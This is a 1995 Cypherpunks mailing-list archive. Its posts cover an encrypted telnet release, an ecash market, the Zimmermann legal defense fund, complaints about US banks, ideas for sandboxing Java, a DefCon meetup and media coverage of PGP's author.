utopia.hacktic.nl Sun Jul 30 07:53:41 1995 From: usura at utopia.hacktic.nl (uSuRa) Date: Sun, 30 Jul 95 07:53:41 PDT Subject: Encrypted Telnet Message-ID: <199507301453.QAA00526@utopia.hacktic.nl> Ed Carp sez: : On Sun, 30 Jul 1995, Flame Remailer wrote: : : > Announcing CryptoTCP beta version 0.9 [..] : Oh, thanks a lot - tell us everything except where to get it... ftp://utopia.hacktic.nl/pub/crypto/ -- Alex de Joode Fear, Uncertainty and Doubt, Inc. From pgf at tyrell.net Sun Jul 30 07:59:45 1995 From: pgf at tyrell.net (Phil Fraering) Date: Sun, 30 Jul 95 07:59:45 PDT Subject: You asked for it...4/5 In-Reply-To: <199507301435.AA26950@xs1.xs4all.nl> Message-ID: <199507301454.AA08932@tyrell.net> From: Alex de Joode Date: Sun, 30 Jul 1995 16:35:41 +0200 (MET DST) Organization: Replay and Company UnLimited. X-Reposting-Policy: ReDistribute Only with Permission X-Pgp-Key-Id: 0x8d56913d X-Mailer: ELM [version 2.4 PL21] Content-Type: text Content-Length: 122 Sender: owner-cypherpunks at toad.com Precedence: bulk I did only receive picture number 4, the others never showed up. -- Alex de Joode Fear Uncertainty and Doubt, Inc. It's probably because of the memory problems that toad's mail computer has been having. It might get through if you ask the person to mail it to you directly instead of to the list. (P.S.: If toad isn't having memory problems, please, noone correct me. ;-) Phil From mark at unicorn.com Sun Jul 30 08:24:50 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Sun, 30 Jul 95 08:24:50 PDT Subject: Experimental Ecash Market Message-ID: For those who want to buy and sell ecash for real cash, there's now an experimental Ecash Market WWW page at : http://www.c2.org/~mark/ecash/ecash.html You can submit an offer to add to the lists of buyers and sellers for free (though if people start submitting fake offers I may charge for it in future), or buy the email address of a buyer or seller for c$ 0.50. Since I'm still in the process of finishing off the software, the site may go up and down, or simply get dodgy, over the next few weeks. Mark From roy at cybrspc.mn.org Sun Jul 30 09:11:27 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Sun, 30 Jul 95 09:11:27 PDT Subject: Encrypted Telnet In-Reply-To: <199507300601.IAA24503@utopia.hacktic.nl> Message-ID: <950730.110035.8D0.rnr.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, remailer at flame.alias.net writes: > -----BEGIN PGP SIGNED MESSAGE----- > > Announcing CryptoTCP beta version 0.9 Looks fun. Any chance of a pointer to where to find it? - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at cybrspc.mn.org -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBMBus0Bvikii9febJAQHVHQQAkvFmTeUttqQTQHmlS+/7G8Kb6jigfLFT 8pcT0rnkDDuRPD902F7xRLO+5OPQaM19w1Z7rY8jcaKW/01pTkqISfpCTyWsF6F5 MRO3CKMDMuy9Y7QTYh4E7115tf7rkkfm40anM34RJ2ZXrEsEUL9erJaV4aA5DigT ldA4MQQI3PY= =kjrb -----END PGP SIGNATURE----- From dani.goldenholz at vircomm.com Sun Jul 30 09:33:24 1995 From: dani.goldenholz at vircomm.com (Dani Goldenholz) Date: Sun, 30 Jul 95 09:33:24 PDT Subject: Crypto Law Survey Message-ID: <1775103966.462267@vircomm.com> Thanks man! From crypto at shaq.midex.com Sun Jul 30 09:36:24 1995 From: crypto at shaq.midex.com (Crypto Defender) Date: Sun, 30 Jul 95 09:36:24 PDT Subject: Experimental Ecash Market In-Reply-To: Message-ID: Mark, Let me know if you need any help with the page. I am willing and able to set up a similar server at my site here at Midex. I need to get up and going with the various ecash software. Is there a comprehensive list or pointers out there to be had? Matt On Sun, 30 Jul 1995, Rev. Mark Grant wrote: > > For those who want to buy and sell ecash for real cash, there's now an > experimental Ecash Market WWW page at : > > http://www.c2.org/~mark/ecash/ecash.html > > You can submit an offer to add to the lists of buyers and sellers for free > (though if people start submitting fake offers I may charge for it in > future), or buy the email address of a buyer or seller for c$ 0.50. Since > I'm still in the process of finishing off the software, the site may go up > and down, or simply get dodgy, over the next few weeks. > > Mark > From nsb at nsb.fv.com Sun Jul 30 11:25:36 1995 From: nsb at nsb.fv.com (nsb at nsb.fv.com) Date: Sun, 30 Jul 95 11:25:36 PDT Subject: Zimmermann legal fund Message-ID: <9507301823.AB20787@ nsb.fv.com> >Nathaniel Borenstein writes on cpunks: >The URL being used is http://www.netresponse.com/zldf, and nowhere >does it mention using PGP and CC #'s. Most people who can't use PGP >aren't going to be interested I would have thought. Actually, I think you're wrong on that score. I've met quite a few people who understand the importance of the principles involved, and who support Phil's caue wholeheartedly, but who have never even tried to learn PGP (never felt the need, I guess). However, I agree that the pages should at least contain a link to the other ZLDF site, which mentions how to use PGP and credit card numbers. >Okay, now separate issue, really talking about FV now. For me, the >main thing holding me back from using it is that I'm not in the US, >and don't have a US bank account to open a FV seller acct. (I would >have liked to use it as one of the few net payment systems actually up >and running, as a payment method for the RSA T-shirts, it would have >been a nice system, allowing me to effectively accept VISA payments >which I have otherwise been unable to do.) > >Any news on this front? Last I looked on your WWW page, you were >investigating this and payments in other currencies. US$ would be >fine though, as long as it was possible for the seller to create a US >account, or have it paid to a non-US account (would it not be possible >to pay to non-US account?). Of course it's possible, and it's definitely something we intend to do *eventually*. The real question is how hard it is, and how high-priority it is. We're trying to do a zillion things at once, as you can imagine. To pay into non-US accounts, we need to establish banking relationships in other venues. For the most part, we need to do it one country at a time, which is awesomely time-consuming (although there may be some shortcuts, e.g. to do all of Europe at once). However, it is worth noting that we DO have non-US sellers already. Remember, the requirement is not that you be in the US, but rather than you have an account in a US bank. This is not all that hard for a non-US citizen to do **IF** you can show up physically at a US bank. Thus, if there's a US bank that has an office near you, you can walk in and open an account to which deposits can be made through the US direct-deposit system, and you're in business with FV. What we'd really hoped to have up and running by now, as a short-term expedient, was an expedited mechanism whereby non-US people could open accounts at a US bank by mail, without the physical presence. This turns out to be contrary to a lot of established procedures in the US banking world, so we're still looking for a bank that's willing to set up this kind of expedited procedure for account setup. If and when we get that working, we will certainly be announcing the availability of that service on fv-users and similar venues. (I probably won't announce it on cypherpunks, since I think many people already think FV is too-much-discussed here. My intent with FV on cypherpunks is to only talk about FV in contexts where it is directly relevant, in particular when other people bring it up.) -- Nathaniel From sp7yav at kielce.ampr.org Sun Jul 30 12:23:57 1995 From: sp7yav at kielce.ampr.org (sp7yav at kielce.ampr.org) Date: Sun, 30 Jul 95 12:23:57 PDT Subject: punk's not dead! Message-ID: <8779@kielce.ampr.org> hello? i'am new on this stuff, help me! From perry at panix.com Sun Jul 30 15:05:37 1995 From: perry at panix.com (Perry E. Metzger) Date: Sun, 30 Jul 95 15:05:37 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <199507282003.AA24860@tyrell.net> Message-ID: <199507302205.SAA20751@panix4.panix.com> Phil Fraering writes: > How would you make Java secure or create a secure Javalike language? > (Secure to your satisfaction, of course). Well, you can't make anything secure, but you can make things more secure. My fundamentnal design principles are: 1) You can't abuse features you don't have. 2) You can't abuse privs you don't have. 3) You can't catastrophically fail to do something you don't do. I would eliminate the notion of having the Java interpreter make the system "safe" with language features that cripple certain threads of execution. Instead, I'd emasculate the whole system. Remove any i/o features right out of the interpreter -- ditto execution features or other features. I'd run the interpreter in a separate unix process communicating only through two pipes, one down which you feed code and mouse events and one up which you get bitmaps and URLs to fetch. The interpreter runs in a padded cell and can't alter the world except by passing up bitmaps and URLs. It doesn't talk to anything other than the browser. Even then, I'm not entirely comfortable, but I'm more comfortable. > What sort of interface does it have to the filesystem? I would guess that > a secure language would have its own filesystem mapped to a file of fixed > size in the normal filesystem, so that it couldn't cause disaster by > filling your hard disk. Thats not a secure system, because you depend on the interpreter properly doing the mapping. If there are no system calls to open(2) in the whole program it can't misuse any of those calls. If there are no calls to exec, it can't mis-execute things. Security through emasculation. Perry From bdavis at thepoint.net Sun Jul 30 15:09:33 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 30 Jul 95 15:09:33 PDT Subject: Military Prisons for Citizen-Units In-Reply-To: Message-ID: On Sat, 29 Jul 1995, Timothy C. May wrote: > At 5:42 PM 7/28/95, Brian Davis wrote: > >The military is not authorized to listen in to any phone calls they want > >to hear. Otherwise, everyone on the list, including me, would probably > >be in some hidden military prison. > > > >:-) for the humor-impaired. > > This is not so. > > The military _did_ put me in one of their hidden military prisons, but > decided I would be more useful on the Cypherpunks list. I recognize several > other names here from my work brigade. > > --Citizen-Unit Tim "The Zek" May > I said nothing about co-opting formerly free spirits for undercover duty. Having outed yourself, you have subjected yourself to termination. After all the government has done for you ... a pity. But a good example to the "others." Darth Vader From jamesd at echeque.com Sun Jul 30 15:24:37 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 30 Jul 95 15:24:37 PDT Subject: Zimmermann legal fund Message-ID: <199507302224.PAA10093@blob.best.net> At 02:23 PM 7/30/95 EDT, nsb at nsb.fv.com wrote: > However, it is worth noting that we DO have non-US sellers already. > Remember, the requirement is not that you be in the US, but rather than you > have an account in a US bank. This is not all that hard for a non-US > citizen to do **IF** you can show up physically at a US bank. Many years ago I obtained a US account by mail from overseas, using cheques made out to me from US sources. I did this with the bank of America. No big problem. But as time went by, their ability to handle financial events that were out of the ordinary deteriorated spectacularly. Perhaps this is partly because things tightened up, but it is also that most US banks have developed a monolithic and obstructionist bureaucracy that is incapable of handling any event that is out of the ordinary. > What we'd really hoped to have up and running by now, as a short-term > expedient, was an expedited mechanism whereby non-US people could open > accounts at a US bank by mail, without the physical presence. This turns > out to be contrary to a lot of established procedures in the US banking > world, By and large, over the past twenty years, there has been a decisive move towards financial management by guys who could not find their ass with both hands. US banks simply do not work well for international transactions. The problem is not so much money laundering laws as intolerable ignorance, provincialism, and incompetence. If you insist that international transactions be mediated through US banks, you are cutting your throat. Go look for banks that are truly international. You will not find them in America. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From usura at replay.com Sun Jul 30 15:58:33 1995 From: usura at replay.com (Alex de Joode) Date: Sun, 30 Jul 95 15:58:33 PDT Subject: Zimmermann legal fund Message-ID: <199507302258.AA04135@xs1.xs4all.nl> James A. Donald sez: [..] : US banks simply do not work well for international transactions. : The problem is not so much money laundering laws as intolerable : ignorance, provincialism, and incompetence. : If you insist that international transactions be mediated through : US banks, you are cutting your throat. : Go look for banks that are truly international. You will not : find them in America. You could try ABN*AMRO of The Netherlands, they have offices in most European countries, Asia, Middle East and Latin America, beside that they are the largest foreign bank in the US owning LaSalle in the Chicago area and European American Bank in the New York area. Citicorp also claims to have a global presence. -- Alex de Joode Fear Uncertainty and Doubt, Inc. From shamrock at netcom.com Sun Jul 30 16:08:35 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 30 Jul 95 16:08:35 PDT Subject: Zimmermann legal fund Message-ID: <199507302305.TAA16631@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199507302224.PAA10093 at blob.best.net>, jamesd at echeque.com ("James A. Donald") wrote: >Many years ago I obtained a US account by mail >from overseas, using cheques made out to me from >US sources. > >I did this with the bank of America. No big problem. But as >time went by, their ability to handle financial events that were >out of the ordinary deteriorated spectacularly. > >Perhaps this is partly because things tightened up, but >it is also that most US banks have developed a monolithic >and obstructionist bureaucracy that is incapable of handling >any event that is out of the ordinary. Six years ago, you could walk into a Bank, show them your driver license, and open an account. Today, you need several pieces of ID. Three years ago, you could withdraw money from your own account without having your checkbook on you. Today, they make you pay for a "counter check". One year ago, you could walk into a bank an cash a check drawn onto an account at the very same bank. Today (Coast Federal), they make you pay a $10 check cashing fee. The US banking industry has gone to the dogs. The day a non-US bank offers an account that can be accessed over the net will be the day I close my US accounts. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMBwQDCoZzwIn1bdtAQGqHQF8C1QShMuN0Eq74mMI5rculIym8xjzYV8C mErjtB8tJ7UseKD9bmNY6dpWqBviplMp =aBGi -----END PGP SIGNATURE----- From QLDM75A at prodigy.com Sun Jul 30 17:05:16 1995 From: QLDM75A at prodigy.com (MR ELDON B JENKINS) Date: Sun, 30 Jul 95 17:05:16 PDT Subject: C'punks at DefCon Message-ID: <013.09272796.QLDM75A@prodigy.com> > Are any of us cpunks having a gathering at Defcon? (besides the > one Well, a couple other c'punks have mailed me to determine a time and a place. It looks like everyone wants to meet in the lobby of the Tropicana sometime Friday before Hacker Jeopardy. Nobody has stated a concrete time yet so I guess we'll all just wander through the lobby every now and then. Any suggestions on a time? Eldon Jenkins From erc at khijol.intele.net Sun Jul 30 17:16:24 1995 From: erc at khijol.intele.net (Ed Carp [khijol SysAdmin]) Date: Sun, 30 Jul 95 17:16:24 PDT Subject: Zimmermann legal fund In-Reply-To: <199507302305.TAA16631@bb.hks.net> Message-ID: On Sun, 30 Jul 1995, Lucky Green wrote: > Six years ago, you could walk into a Bank, show them your driver license, > and open an account. > Today, you need several pieces of ID. > Three years ago, you could withdraw money from your own account without > having your checkbook on you. > Today, they make you pay for a "counter check". > One year ago, you could walk into a bank an cash a check drawn onto an > account at the very same bank. > Today (Coast Federal), they make you pay a $10 check cashing fee. When I lived in California, I banked at Security Pacific, then changed over my account to BofA. When I left the bay area, I closed my account, not knowing that someone had sat on a check for $120 - I thought it was me just entering an ATM receipt twice (as I do from time to time). So, someone from a place called ChexSystems sends me a letter, saying "well, you had a check go through and the bank paid it, please pay us." So, I send them the $120 or whatever it was. When I tried to open a checking acount in Utah, I find that I can't, for the sole reason that I had been "reported to ChexSystems". I explained the situation to no avail. BofA refuses to remove the charge, saying that it's "against their policy". ChexSystems refuses to do anything about it, saying that "it was a valid debt", one which I neither knew about nor agreed to. If the bank would've mailed me a letter, saying that they bounced the check, or paid it and please remit, I would've been happy to. Instead, they chose to try and screw me over by reporting the so-called "debt" to some sort of check reporting system. From my point of view, the action by the bank was malicious and done with the intent of causing me harm. I don't recommend anyone doing business with BofA for this reason, and I strongly urge that people immediately close their accounts with BofA, refuse to do business with them, and switch to another bank which refuses to participate in such malicious practices. I'm *not* impressed. -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From kdf at gigo.com Sun Jul 30 17:34:07 1995 From: kdf at gigo.com (John Erland) Date: Sun, 30 Jul 95 17:34:07 PDT Subject: Another Newsgate Dies Message-ID: <726_9507301723@gigo.com> Looks like mail2news at bham.ac.uk is also dead now (wait, isn't the utexas gate _also_ dead, or was it so problematic that it was not advised?): +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++=+=+=+=+=+=+ * Originally from news2mail at sun4.bham.ac.uk (1:203/2) to John Erland. * Original dated: Jul 30 '95, 04:05 This reply has been automatically generated by the mail-to-news system. Your message was not posted to Usenet because this facility has been withdrawn. Use a different mail-to-news gateway, such as the one at cs.utexas.edu (mail news-group-name at cs.utexas.edu). The text of your rejected message is below... ---- -- : Fidonet: John Erland 1:203/8055.12 .. speaking for only myself. : Internet: kdf at gigo.com From kelli at zeus.towson.edu Sun Jul 30 17:58:02 1995 From: kelli at zeus.towson.edu (K. M. Ellis) Date: Sun, 30 Jul 95 17:58:02 PDT Subject: PRZ Interview in Infobahn Magazine Message-ID: I generally try to avoid buying anything with the word "Infobahn" on it, but in the premiere issue of this new magazine there's a 5-page article about Phil Zimmerman written by Jeff Elliot (of the National Review...but it's a good article anyway ;). It's pretty good--if anyone is new to the ongoing Zimmerman drama it's a good sum-up. -=Kathleen M. Ellis=- (This message also serves as a test for the new DC-Cypherpunks list server.) kelli at zeus.towson.edu http://zeus.towson.edu/~kelli/ GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z** Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11 From bailey at computek.net Sun Jul 30 19:42:52 1995 From: bailey at computek.net (Mike Bailey) Date: Sun, 30 Jul 95 19:42:52 PDT Subject: Zimmermann legal fund In-Reply-To: <199507302305.TAA16631@bb.hks.net> Message-ID: > The US banking industry has gone to the dogs. The day a non-US bank offers > an account that can be accessed over the net will be the day I close my US > accounts. Interesting idea ... 1st question or thing I would want to be certain of is the stability of the currency of the realm so to speak. I wouldn't want to bank in a country that had a weak currencey (sp) or was subject to roller coaster economics. -Mike ************************************************************************** * Personal internet account, opinions and ideas do not reflect those * * of my employer * * Mike Bailey (hm)214-252-3915 * * email bailey at computek.net (wk)214-456-4510 * * * * "Remember you can tune a piano but you can't tuna fish -Joe Walsh" * * http://www.computek.net/public/bailey/ * ************************************************************************** From liberty at gate.net Sun Jul 30 20:41:06 1995 From: liberty at gate.net (Jim Ray) Date: Sun, 30 Jul 95 20:41:06 PDT Subject: Zimmermann legal fund Message-ID: <199507310338.XAA00176@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Mike wrote: >Interesting idea ... > >1st question or thing I would want to be certain of is the stability of the >currency of the realm so to speak. I wouldn't want to bank in a country that >had a weak currencey (sp) or was subject to roller coaster economics. > Who knows...An international free market in banking might eventually lead us back to the evil old gold standard and slowly make the bureaucrats of the Federal Reserve obsolete. How awful. JMR - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMBxLLW1lp8bpvW01AQGw8AP/fAWaHgPO064Pv/4JoqcrLDmBBytGR0Tz MfArYuG7/yogyewbZaRkW/MAk7T4IsfXO3BnCQu8PS2MoaGTpTNE3qd30CP6G0v8 4ljZVUCgA+BW8yXfZVWUm+rsoZ8xXkZvtu6Ug8PKMjLzOoeSm+ET4Oq47SUKqSVC mHQVFh92asQ= =L5vT - -----END PGP SIGNATURE----- Regards, Jim Ray "This year or next, for the first time since the end of World War II, we will spend more for interest payments on the debt than on defense. Quite a stunning thing." -- President Bill Clinton "I'm sure as hell stunned!" -- citizen Jim Ray - ------------------------------------------------------------------------ PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 - ------------------------------------------------------------------------ Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! email: zldf at clark.net or visit http://www.netresponse.com/zldf ________________________________________________________________________ - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMBxQGioZzwIn1bdtAQFwzQGA1rJZcc07cuvSS9T0ktCECLfZYuPboy3n u00aBTPNMYTLXNc6V4vtHYAn85QOn7dT =bQfM -----END PGP SIGNATURE----- From tcmay at sensemedia.net Sun Jul 30 20:57:03 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Sun, 30 Jul 95 20:57:03 PDT Subject: U.S. Banks are not all that bad Message-ID: Hate to disagree with Lucky, but.... At 11:05 PM 7/30/95, Lucky Green wrote: >Six years ago, you could walk into a Bank, show them your driver license, >and open an account. >Today, you need several pieces of ID. I've cashed checks at Bank of America, Wells Fargo, Comerica (whatever _that_ is), etc., without having an account at these banks, and without having to pay any fee, and without any more ID than a driver's license. (I have no accounts at California banks, so all checks sent to me are, perforce, not checks drawn at "my" bank...and yet I've never had to pay a dime to cash a check. The times I've gotten out of state checks, I've of course not expected third parties to cash them for free for me...usually I just deposit them by mail.) >Three years ago, you could withdraw money from your own account without >having your checkbook on you. >Today, they make you pay for a "counter check". Hasn't happened to me. >One year ago, you could walk into a bank an cash a check drawn onto an >account at the very same bank. >Today (Coast Federal), they make you pay a $10 check cashing fee. Hasn't happened to me. I walk into banks, present the checks drawn on their own bank, ask to have it cashed, and all they want is to make sure I'm the person to whom the check is drawn. No fees, no refusals to cash. >The US banking industry has gone to the dogs. The day a non-US bank offers >an account that can be accessed over the net will be the day I close my US >accounts. Maybe I have the magic touch. I find U.S. banks to be marvels of efficiency. (But then I can remember running out of cash on a Saturday and having no way to get any more cash except by borrowing from friends...the ATM revolutionized things around 1980.) I'm not speaking of "interesting" banking applications, which, I fear, are not permitted by current U.S. banking laws. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From enzo at ima.com Sun Jul 30 21:11:06 1995 From: enzo at ima.com (Enzo Michelangeli) Date: Sun, 30 Jul 95 21:11:06 PDT Subject: Zimmermann legal fund In-Reply-To: Message-ID: On Sun, 30 Jul 1995, Mike Bailey wrote: > > The US banking industry has gone to the dogs. The day a non-US bank offers > > an account that can be accessed over the net will be the day I close my US > > accounts. > > Interesting idea ... > > 1st question or thing I would want to be certain of is the stability of the > currency of the realm so to speak. I wouldn't want to bank in a country that > had a weak currencey (sp) or was subject to roller coaster economics. How could it be worse than with the U.S. of A.?? ;-) Seriously: you may bank in US Dollars (or other major currencies) in many countries, including all the offshore banking centres. Limited amounts of cash may be withdrawn using ATM dispensers, against a fee of two or three USD per operation; for larger amounts, you may ask them to wire money by SWIFT, Telex or bank drafts to other banks or genric payees. For such operations, most large banks accept instructions by snail mail, and sometimes by fax (if the customer signs a letter of indemnity exempting the bank from liabilities in case of forgeries). Sadly, AFAIK no bank is accepting digitally encrypted and signed e-mail instructions, and issuing digitally encrypted and signed receipts. From bdavis at thepoint.net Sun Jul 30 21:25:48 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 30 Jul 95 21:25:48 PDT Subject: C'punks at DefCon In-Reply-To: <013.09272796.QLDM75A@prodigy.com> Message-ID: On Sun, 30 Jul 1995, MR ELDON B JENKINS wrote: As you may recall from my earlier remarks, I'll be in Vegas for a vacation, but am leaving Friday morning. For anyone who gets there early and would like to have a drink and chat with a non-lurking fed, I'll stroll through the Tropicana lobby around 7:00 p.m. Thursday, wearing some law enforcement icon (probably my "FBI Training Academy" shirt). I hope the Tropicana has metal detectors ... EBD > > Are any of us cpunks having a gathering at Defcon? (besides the > > one > > Well, a couple other c'punks have mailed me to determine a time and a > > place. It looks like everyone wants to meet in the lobby of the > Tropicana sometime Friday before Hacker Jeopardy. Nobody has stated > > a concrete time yet so I guess we'll all just wander through the > lobby every now and then. Any suggestions on a time? > > Eldon Jenkins > > From tcmay at sensemedia.net Sun Jul 30 21:27:55 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Sun, 30 Jul 95 21:27:55 PDT Subject: PRZ Interview in Infobahn Magazine Message-ID: Lord, I'm going to get in trouble for writing this message... (And Phil, if you happen to read Cypherpunks now and read this, understand the context of my comments...) At 12:57 AM 7/31/95, K. M. Ellis wrote: >I generally try to avoid buying anything with the word "Infobahn" on it, >but in the premiere issue of this new magazine there's a 5-page article >about Phil Zimmerman written by Jeff Elliot (of the National Review...but >it's a good article anyway ;). It's pretty good--if anyone is new to the >ongoing Zimmerman drama it's a good sum-up. It may be a good article, but as soon as I saw yet another "personality" interview with PRZ in the new trendzine "Infobahhn," I put the issue back on the shelf. (Not just because of the PRZ personality piece, but because I'm ODd (that's "overdosed" to you younger folks) on "Wired," "Mondo 2000," "Access," "Ray Gun," "The Net", and all the slightly more technical magazines like "MIME World," "Java Times," and "Diffie-Hellman Newsletter" (yes, these last three items are fictitious). Just my opinion, but I think the Information Superhypeway is indeed being over-hyped. In case you're wondering, I did indeed agree to be photographed for the cover of "Wired" #2, a few years ago. All I can say is, "I'm sorry." Bay Aryans can attest to the fact that in the last several months I've refused to have anything to do with the various hypings and personality profiles the info rags are so focussed on. I enjoyed talking to Timothy Leary for a few minutes at a party, but refused to appear on camera with him in a "Cypherpunks on parade" segment for a Japanese television program. I'm not condemning those who do interviews--I did a few myself--but I think there' something to be said for avoiding the "personality profiles" which so superficially cover the issues. (At least it's not (yet?) as bad at the media's fascination with Mitnick and Shimomura....I about barfed to read the tale of "The Hooker and the Hacker" in the latest "Esquire," the one with Cindy Crawford on the cover. Then, just today, my younger brother told me he'd been reading about Mitnick and Shimomura in "Rolling Stone.") Anyway, flame away with your claims that publicity is good, that the dozens of PRZ interviews are doing some good. I'm becoming more of a Zen Buddhist monastic skeptic on these issues every day. --Tim May, happy to be far from the madding crowd .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From cman at communities.com Sun Jul 30 21:40:08 1995 From: cman at communities.com (Douglas Barnes) Date: Sun, 30 Jul 95 21:40:08 PDT Subject: U.S. Banks are not all that bad Message-ID: As near as I can tell, there are spotty instances of the behavior Lucky describes, but it is becoming more common, especially wrt required ID. I must say that I've had some absolutely amazingly bad experiences with banks in Asia, Mexico and Central America, so I'm a skeptic when it comes to assuming that non-US banks are light years better. Although I have no direct experience of European banking, I do know that the European banking industry, taken as a whole, is substantially behind the US banking industry in automation and efficiency. Most of the irritation that I hear reported about US banks is the result of pushing customers too hard to change expensive banking habits or erecting policies that eliminate money-losing practices without regard to their impact on customer goodwill. At First Interstate recently, I had to make a withdrawal from the teller, as the ATM was broken. Their policy _does_ reqiure a "counter check", and normally they charge, but when I explained that the ATM was kaput they did it for free. It is _much_ cheaper for them if you use the ATM, and this kind of policy is designed to encourage you to do this. It's the kind of thing that the market will sort out nicely -- if it irritates people and loses them money more than it saves them money, they will stop doing it. Remember, the US has an absolutely fantastic amount of competition wrt banking services, especially when compared to other countries. From stewarts at ix.netcom.com Sun Jul 30 22:23:41 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 30 Jul 95 22:23:41 PDT Subject: Sat phone permit "wire"taps Message-ID: <199507310521.WAA08390@ix4.ix.netcom.com> >> "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include >> features to permit authorized eavesdropping, officials said. Sigh... >> Hmm. Anyone here ever heard of the Walkers, or the Rosenbergs? Different cases - the Walkers gave away information on how the Yankees were stealing Russian secrets, which the Russians patched up by encrypting. The most current information on the Rosenbergs, gotten from decrypted Soviet communications and declassified US and ex-Soviet files, indicates that Ethel Rosenberg was probably innocent of spying, and Julius was spying but didn't give away any useful atomic secrets, and that the FBI probably knew at the time they had Ethel killed that she was innocent. Sometimes even having your secrets cracked isn't enough to protect you.... #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A At 08:40 PM 7/28/95 -0400, Alex Tang wrote: >> The answer is to have some non-USA entity build shareable full fledged >> full powered crypto libraries and provide them for free for the rest of >> the world and for all machines. >Wouldn't there still be licensing issues to deal with (in the states at >least)?? I'm sure RSA would claim that the package would be in violation >of the licensing... If you did everything in an RSAREF-compatible manner, that would help; I think somebody outside the US has written an RSAREF-clone. Some problems include building programs that have generic-callout hooks instead of crypto-specific hooks (so that they don't get bitten by ITAR), while still maintaining reasonable efficiency and convenience. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A Message-ID: <199507310618.XAA23903@infinity.c2.org> > The tightwad, privacy-loathing scumbags I work for sprang just such a > document on us recently, and after squirming and bitching about it for a > while, I actually did sign, simply because I wasn't prepared to lose my job > at that point. My fear, based on well-established tradition, is that > eventually this will become widespread and more and more employers will > monitor email, with coerced "consent." I really don't see what the big deal is. That's why you use a commercial/non-work ISP for personal email, etc. -- sameer Voice: 510-601-9777 Network Administrator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From stewarts at ix.netcom.com Sun Jul 30 23:38:36 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 30 Jul 95 23:38:36 PDT Subject: Zimmermann legal fund Message-ID: <199507310635.XAA25441@ix9.ix.netcom.com> At 02:23 PM 7/30/95 EDT, nsb at nsb.fv.com wrote: >To pay into non-US accounts, we need to establish banking relationships in >other venues. For the most part, we need to do it one country at a time, >which is awesomely time-consuming ..... >Remember, the requirement is not that you be in the US, but rather than you >have an account in a US bank. This is not all that hard for a non-US >citizen to do **IF** you can show up physically at a US bank. Thus, if >there's a US bank that has an office near you, you can walk in and open an >account to which deposits can be made through the US direct-deposit system, >and you're in business with FV. Aren't there some banks or similar companies that are world-wide, but have US branches? I think SwissBankCorp or somebody like that has an office in San Francisco; would it be possible for you to transfer money to someone with an account there who's really in, say, Switzerland or the UK or Hong Kong? #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 